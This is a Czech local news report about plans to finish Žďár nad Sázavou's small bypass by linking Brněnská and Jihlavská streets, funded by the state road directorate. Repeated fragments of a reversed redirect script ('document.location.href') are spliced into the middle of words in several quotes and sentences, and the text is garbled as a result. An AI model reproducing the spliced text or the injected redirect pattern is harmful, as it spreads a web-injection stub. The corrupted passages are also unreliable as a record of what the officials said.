Rainbow page separator

Propojení Jihlavské a Brněnské ulice je plánováno do pěti let

Čtvrtek, 14. ledna 2016

Žďár nad Sázavou / Jakým způsobem nejlépe financovat pokračování takzvaného malého obchvatu města, tedy propojení ulic Brněnská a Jihlavská, řešili zástupci žďárské radnice s ministrem dopravy Danem Ťokem. Podle jeho slov by bylo možné obchvat dokončit v režii státu, konkrétně z prostředků Ředitelství silnic a dálnic (ŘSD) ČR. Za předpokladu, že by se komunikace v Jihlavské ulici, kudy vede krajská silnice, změnila na státní. „Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože by šlo o navázání obchvatu na krajskou komunikaci, je tady možnost, že bychom si s krajem vyměnili dvě silnice, takže by pak bylo možné do obchvatu inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat z prostředků ŘSD,“ sdělil Dan Ťok.
Pokračování „malého“ obchvatu, který by vytěsnil tranzitní dopravu z křižovatky v Jihlavské ulici, by mohlo být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo přibližně za pět let, množná i dříve. Šlo by asi o sedm set metrů nové silnice. Projekt by mohla urychlit také skutečnost, že pozemky potřebné pro stavbu obchvatu jsou prakticky s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toprocentně ve vlastnictví města.
Nová část obchvatu Žďáru by představovala pokračování přeložky silnice I/19, která od podzimu vede od křižovatky u Mělkovic přes průmyslovou zónu a ústí na kruhové křižovatce v Brněnské ulici. „Domluvili jsme se, že ŘSD už le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos zadá technickou studii propojení Brněnské ulice s Jihlavskou,“ uvedl žďárský starosta Zdeněk Navrátil.